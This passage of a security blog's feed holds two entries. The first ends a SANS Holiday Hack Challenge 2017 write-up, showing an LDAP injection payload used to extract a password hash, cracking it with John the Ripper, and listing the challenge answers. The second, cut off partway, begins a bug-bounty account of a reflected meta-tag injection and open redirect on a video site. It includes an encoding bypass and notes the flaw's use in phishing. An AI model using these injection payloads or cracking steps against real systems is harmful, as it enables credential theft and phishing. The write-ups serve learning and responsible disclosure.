                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#inneroverlay&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;html&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.overlay&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;css&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;display&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;flex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Incorrect Password...&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;You must be a Claus to access this panel!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we need to find a way to get his password. Let's take a look at the
application. Apparently, we can query the application's database for elves or
reindeers matching certain names, and get some properties:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/search&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;np-auth&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTAxLTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.OsSuRkYF-13eNfXyuCDYmb9XUjBhnbmQ9Oe1yRWDrH0&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com/home.html&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=4wtVec24212atYU1RpE3&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

name=alabaster&amp;amp;isElf=True&amp;amp;attributes=profilePath,gn,sn,mail
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 08 Jan 2018 00:08:50 GMT&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;


[[[&amp;quot;cn=alabaster,ou=elf,dc=northpolechristmastown,dc=com&amp;quot;,{&amp;quot;gn&amp;quot;:[&amp;quot;Alabaster&amp;quot;],&amp;quot;mail&amp;quot;:[&amp;quot;alabaster.snowball@northpolechristmastown.com&amp;quot;],&amp;quot;profilePath&amp;quot;:[&amp;quot;/img/elves/elf1.PNG&amp;quot;],&amp;quot;sn&amp;quot;:[&amp;quot;Snowball&amp;quot;]}]]]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Given the result's format, we can expect the application to performan LDAP
query to retrieve the wanted attributes. If only we knew the syntax of this
query... But, wait! Let's see what we have in the application source code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;//Note: remember to remove comments about backend query before going into north pole production network&lt;/span&gt;
&lt;span class="cm"&gt;/*&lt;/span&gt;

&lt;span class="cm"&gt;isElf = &amp;#39;elf&amp;#39;&lt;/span&gt;
&lt;span class="cm"&gt;if request.form[&amp;#39;isElf&amp;#39;] != &amp;#39;True&amp;#39;:&lt;/span&gt;
&lt;span class="cm"&gt;    isElf = &amp;#39;reindeer&amp;#39;&lt;/span&gt;
&lt;span class="cm"&gt;attribute_list = [x.encode(&amp;#39;UTF8&amp;#39;) for x in request.form[&amp;#39;attributes&amp;#39;].split(&amp;#39;,&amp;#39;)]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cm"&gt;result = ldap_query(&amp;#39;(|(&amp;amp;(gn=*&amp;#39;+request.form[&amp;#39;name&amp;#39;]+&amp;#39;*)(ou=&amp;#39;+isElf+&amp;#39;))(&amp;amp;(sn=*&amp;#39;+request.form[&amp;#39;name&amp;#39;]+&amp;#39;*)(ou=&amp;#39;+isElf+&amp;#39;)))&amp;#39;, attribute_list)&lt;/span&gt;
&lt;/span&gt;
&lt;span class="cm"&gt;#request.form is the dictionary containing post params sent by client-side&lt;/span&gt;
&lt;span class="cm"&gt;#We only want to allow query elf/reindeer data&lt;/span&gt;

&lt;span class="cm"&gt;*/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have the syntax of the query. And there doesn't seem to be any filtering
on our parameters, so we can try to perform an &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap"&gt;LDAP injection&lt;/a&gt;.
I recommend you read this link, to better understand how the LDAP syntax works.&lt;/p&gt;
&lt;p&gt;Now, we want to perform our injection in the &lt;code&gt;name&lt;/code&gt; parameter. The goal
is to get a query that will match Santa's user entry. I ended up going with
the following payload: &lt;code&gt;santa*)(ou=*))(&amp;amp;(sn=foo&lt;/code&gt;. Indeed, the final
syntax is then:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;(|(&amp;amp;(gn=*santa*)(ou=*))(&amp;amp;(sn=foo*)(ou=elf))(&amp;amp;(sn=*santa*)(ou=*))(&amp;amp;(sn=foo*)(ou=elf)))
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This query should match Santa, since we're searching for entries with names
containing &lt;code&gt;santa&lt;/code&gt; in any organizational unit. Now, let's perform our
search. Since we're allowed to query any attributes we want, let's ask for the
&lt;code&gt;userPassword&lt;/code&gt; attribute, found in the earlier
&lt;code&gt;LDIF_template.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/search&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;np-auth&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTAxLTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.OsSuRkYF-13eNfXyuCDYmb9XUjBhnbmQ9Oe1yRWDrH0&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com/home.html&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=4F359T9wWTvpBczV3335&lt;/span&gt;

&lt;span class="hll"&gt;name=santa*)(ou=*))(%26(sn=foo&amp;amp;isElf=True&amp;amp;attributes=userPassword
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 08 Jan 2018 00:16:42 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;113&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;[[[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;cn=santa,ou=human,dc=northpolechristmastown,dc=com&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;userPassword&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;d8b4c05a35b0513f302a85c409b4aab3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;]}]]]&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have Santa's hashed password. Given the form, it seems to be an MD5
hash. Let's use &lt;code&gt;JohnTheRippher&lt;/code&gt; again to try and crack it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat santa_password.txt
&lt;span class="go"&gt;d8b4c05a35b0513f302a85c409b4aab3&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; john --format&lt;span class="o"&gt;=&lt;/span&gt;raw-md5 --wordlist&lt;span class="o"&gt;=&lt;/span&gt;./rockyou.txt ./santa_password.txt
&lt;span class="go"&gt;Using default input encoding: UTF-8&lt;/span&gt;
&lt;span class="go"&gt;Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])&lt;/span&gt;
&lt;span class="go"&gt;Warning: no OpenMP support for this hash type, consider --fork=4&lt;/span&gt;
&lt;span class="go"&gt;Press &amp;#39;q&amp;#39; or Ctrl-C to abort, almost any other key for status&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;001cookielips001 (?)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;1g 0:00:00:00 DONE (2018-01-08 01:23) 1.315g/s 18776Kp/s 18776Kc/s 18776KC/s 002007238..00196900&lt;/span&gt;
&lt;span class="go"&gt;Use the &amp;quot;--show&amp;quot; option to display all of the cracked passwords reliably&lt;/span&gt;
&lt;span class="go"&gt;Session completed&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, we have Santa's password! We can now log into the application, and
access his panel. This gives us access to this letter, sent to him:&lt;/p&gt;
&lt;img alt="wizard_of_oz_to_santa_d0t011d408nx.png" class="align-center" src="/images/sans-christmas-challenge-2017/wizard_of_oz_to_santa_d0t011d408nx.png" /&gt;
&lt;p&gt;Here's what the letter says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;From: The Wizard of Oz&lt;/p&gt;
&lt;p&gt;Emerald City, Oz&lt;/p&gt;
&lt;p&gt;To: Santa Claus&lt;/p&gt;
&lt;p&gt;Christmas Town, North Pole&lt;/p&gt;
&lt;p&gt;Dear Santa,&lt;/p&gt;
&lt;p&gt;My old friend! I wish you a very merry Christmas. Thank you for all you do
to bring holiday cheer around the world.&lt;/p&gt;
&lt;p&gt;Every year, I enjoy our gift exchange -- you giving me a Christmas present
and I giving you a Solstice gift. We've exchanged some crazy things in the
past. By my reckoning, you've given me:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Big Hair Hairspray&lt;/li&gt;
&lt;li&gt;Pink Election Campaign Hat&lt;/li&gt;
&lt;li&gt;Bacon Bandages&lt;/li&gt;
&lt;li&gt;Scapy the Unicorn Plush Pillow&lt;/li&gt;
&lt;li&gt;Princess Leia Earmuffs&lt;/li&gt;
&lt;li&gt;Bacon Tie with Giant TV Remote&lt;/li&gt;
&lt;li&gt;Stormtrooper Boxer Shorts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ah what fun times! And I've given you:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The Nubulator&lt;/li&gt;
&lt;li&gt;Garden Gnome&lt;/li&gt;
&lt;li&gt;Justin Bieber Toothbrush&lt;/li&gt;
&lt;li&gt;Snorty the Pig Hat and Pink Gloves&lt;/li&gt;
&lt;li&gt;Giant Inflatable Olaf the Snowman&lt;/li&gt;
&lt;li&gt;Ariana Grande Light-up Cat Ear Headphones&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Well, wait 'til you see what I've got for you this year, my friend! Yule
love it!&lt;/p&gt;
&lt;p&gt;Merry Christmas!&lt;/p&gt;
&lt;p class="attribution"&gt;&amp;mdash;The Wizard&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Well, it's nice to see that Santa gets gifts too!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="answers-to-the-questions"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id59"&gt;Answers to the questions&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Let's answer the questions:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;cite&gt;Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The title of the first page of &lt;em&gt;The Great Book&lt;/em&gt; is &lt;strong&gt;About This Book...&lt;/strong&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;&lt;cite&gt;Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The topic of the second page of &lt;em&gt;The Great Book&lt;/em&gt; is the creation of flying
animals in Oz, which lead to the creation of flying reindeers.&lt;/p&gt;
&lt;p&gt;Alabaster Snowball's password is &lt;code&gt;stream_unhappy_buy_loss&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;&lt;cite&gt;The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The name of the share on &lt;code&gt;hhc17-smb-server&lt;/code&gt; is &lt;code&gt;FileStor&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;&lt;cite&gt;Elf Web Access (EWA. is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The fourth page of &lt;em&gt;The Great Book&lt;/em&gt; speaks of the battles between Munchkins and
Elves, the creation of the Lollipop Guild, and their infiltration in the North
Pole population.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;&lt;cite&gt;How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles?  Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;It takes four infractions to be marked as naughty on Santa's list.&lt;/p&gt;
&lt;p&gt;Here are six insider threat moles:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Boq Questrian&lt;/li&gt;
&lt;li&gt;Bini Aru&lt;/li&gt;
&lt;li&gt;Sheri Lewis&lt;/li&gt;
&lt;li&gt;Kirsty Evans&lt;/li&gt;
&lt;li&gt;Nina Fitzgerald&lt;/li&gt;
&lt;li&gt;Beverly Khalil&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The discussion between us, Sam the Snowman, and Bumble informs us that the
person throwing giant snowballs is Bumble, the Abominable Snow Monster.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;&lt;cite&gt;The North Pole engineering team has introduced an Elf as a Service (EaaS.  platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The title of the first page of &lt;em&gt;The Great Book&lt;/em&gt; is &lt;strong&gt;The Dreaded
Inter-Dimensional Tornadoes&lt;/strong&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;&lt;cite&gt;Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI. to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The seventh page of &lt;em&gt;The Great Book&lt;/em&gt; gives us details regarding the Witches of
Oz, their power, and their neutrality during the Great Schism.&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;&lt;cite&gt;Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The letter was written by the Wizard of Oz, Santa's good friend.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;&lt;cite&gt;Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The villain causing the giant snowball problem is Glinda, the &amp;quot;Good&amp;quot; Witch.
She cast a spell on Bumble to make him throw giant snowballs, in order to
create an all-out war between Elves and Munchkins. This would have allowed her
to make a profit, by selling spells to both sides of the war.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id60"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Once again, the SANS staff outdid themselves and gave us an amazing Christmas
challenge. I thought implementing client-side attacks, such as XSS or phishing
attacks was a nice touch. It's also great that designed the challenge to that
people would have to pivot to an internal network. Overall, it kind of reminded
me of when I took my OSCP exam/lab.&lt;/p&gt;
&lt;p&gt;As usual, see you next year!&lt;/p&gt;
&lt;p&gt;[EDIT 2018-03-15]&lt;/p&gt;
&lt;p&gt;This write-up received an &lt;a class="reference external" href="https://holidayhackchallenge.com/2017/winners_answers.html"&gt;honorable mention from the SANS team&lt;/a&gt;.
Even though I didn't win any prize, I'm still super honored to receive this
recognition. Thanks to the SANS team for organizing this challenge, and
special thanks to Jerry Salinas for reviewing my write-up!&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>Meet beautiful XSS in your area: a YouPorn bug bounty [SFW]</title><link href="https://allyourbase.utouch.fr/posts/2017/03/28/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/" rel="alternate"></link><published>2017-03-28T00:00:00+02:00</published><updated>2017-03-28T00:00:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2017-03-28:/posts/2017/03/28/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/</id><summary type="html">&lt;img alt="youporn_logo.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/youporn_logo.png" /&gt;
&lt;p&gt;I don't do bug bounties due to a lack of time. Although I have a &lt;a class="reference external" href="https://hackerone.com/the-useless-one"&gt;HackerOne
profile&lt;/a&gt;, you can see that I'm not so
active. However, &lt;a class="reference external" href="https://hackerone.com/myst404"&gt;a coworker of mine&lt;/a&gt; spends
quite some time on different bug bounty programs.&lt;/p&gt;
&lt;p&gt;On 2017-02-06 evening, when we were both connected to our work …&lt;/p&gt;</summary><content type="html">&lt;img alt="youporn_logo.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/youporn_logo.png" /&gt;
&lt;p&gt;I don't do bug bounties due to a lack of time. Although I have a &lt;a class="reference external" href="https://hackerone.com/the-useless-one"&gt;HackerOne
profile&lt;/a&gt;, you can see that I'm not so
active. However, &lt;a class="reference external" href="https://hackerone.com/myst404"&gt;a coworker of mine&lt;/a&gt; spends
quite some time on different bug bounty programs.&lt;/p&gt;
&lt;p&gt;On 2017-02-06 evening, when we were both connected to our work Jabber server,
he told me that YouPorn had launched their &lt;a class="reference external" href="https://hackerone.com/youporn"&gt;bug bounty program on HackerOne&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;him: youporn bug bounty launched today btw&lt;/p&gt;
&lt;p&gt;me: on hacker one?&lt;/p&gt;
&lt;p&gt;him: yes&lt;/p&gt;
&lt;p&gt;me: no time, i'm migrating my DNS servers&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As I was reading documentation on bind, he wrote me back:&lt;/p&gt;
&lt;blockquote&gt;
him: oh shit, exploitable XSS in the search bar, can't believe it&lt;/blockquote&gt;
&lt;p&gt;Now, things were interesting! I had to hop in. I was also surprised that
nobody had ever found it before. XSS in the search form is the base case.
&lt;span class="strike"&gt;I often go to&lt;/span&gt; errr, some of my friends often go to YouPorn, and
they've never found such a vulnerability on it before.&lt;/p&gt;
&lt;p&gt;Time was of the essence, because we wanted to have a working exploit and report
it before someone else did.&lt;/p&gt;
&lt;div class="section" id="from-lack-of-filtering-to-open-redirect"&gt;
&lt;h2&gt;From lack of filtering to open redirect&lt;/h2&gt;
&lt;p&gt;I fired up my browser and Burp, and sent a request on the search form. I
searched for &lt;code&gt;foobar&amp;quot;&lt;/code&gt;. As you can see in the following screenshot,
the search term is output, without any filtering (except for the capitalization)
in a &lt;a class="reference external" href="https://www.w3schools.com/tags/tag_meta.asp"&gt;meta tag&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="first_payload.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/first_payload.png" /&gt;
&lt;p&gt;However, when we tried to close the meta tag, and open another one, to put
our Javascript payload, we couldn't get it to work:&lt;/p&gt;
&lt;img alt="first_fail.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/first_fail.png" /&gt;
&lt;p&gt;Disappointed, we still decided to exploit the meta HTML tag. It's a powerful
tag, because it has the &lt;code&gt;http-equiv&lt;/code&gt; directive. &lt;a class="reference external" href="https://www.w3schools.com/tags/att_meta_http_equiv.asp"&gt;This directive&lt;/a&gt; allows
you to define the equivalent of an HTTP header in the HTML code.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;http-equiv&lt;/code&gt; directive can take a value of &lt;code&gt;refresh&lt;/code&gt;, which
can be used to redirect a user to another page. This kind of &lt;a class="reference external" href="https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet"&gt;open redirect&lt;/a&gt;
vulnerability can be very useful in case of a phishing attack:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;You send someone a link to &lt;a class="reference external" href="http://youporn.com"&gt;http://youporn.com&lt;/a&gt;, with your payload;&lt;/li&gt;
&lt;li&gt;Your payload redirects them to a site you control, imitating YouPorn's CSS;&lt;/li&gt;
&lt;li&gt;You ask them for their credentials, their credit card number, etc.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We put the following payload to test our vulnerability:&lt;/p&gt;
&lt;img alt="second_fail.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/second_fail.png" /&gt;
&lt;p&gt;As you can see, there is a slight problem: the dash in &lt;code&gt;http-equiv&lt;/code&gt;
is not inserted in the source code. I decided to use some XSS voodoo bypass,
and so, I decided to HTML encode, then URL encode the dash.&lt;/p&gt;
&lt;p&gt;A dash, &lt;code&gt;-&lt;/code&gt;, HTML-encoded is &lt;code&gt;&amp;amp;#45;&lt;/code&gt;, which, URL-encoded, is
&lt;code&gt;%26%2345%3b&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="first_success.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/first_success.png" /&gt;
&lt;p&gt;Boom, we now had a working payload, and were able to redirect users to a
URL of our choosing. Sweet!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="marked-as-duplicate"&gt;
&lt;h2&gt;Marked as duplicate&lt;/h2&gt;
&lt;p&gt;Just as I had found the correct syntax, my coworker, who had already notified
YouPorn, got the following answer:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In fact, this was reported already, &lt;strong&gt;but the original reporter did not
provide a working exploit&lt;/strong&gt;.  What I should do is to close it as duplicate,
because the original  bug was already reported. However &lt;strong&gt;I will leave it
open so you have a  chance to provide a working payload&lt;/strong&gt;.  Note that the
original ticket was triaged. If you find a working  payload, I will triage
your ticket as well as you managed to go further  in the exploitation.&lt;/p&gt;
&lt;p&gt;Thanks and happy hacking&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="from-open-redirect-to-full-reflective-xss"&gt;
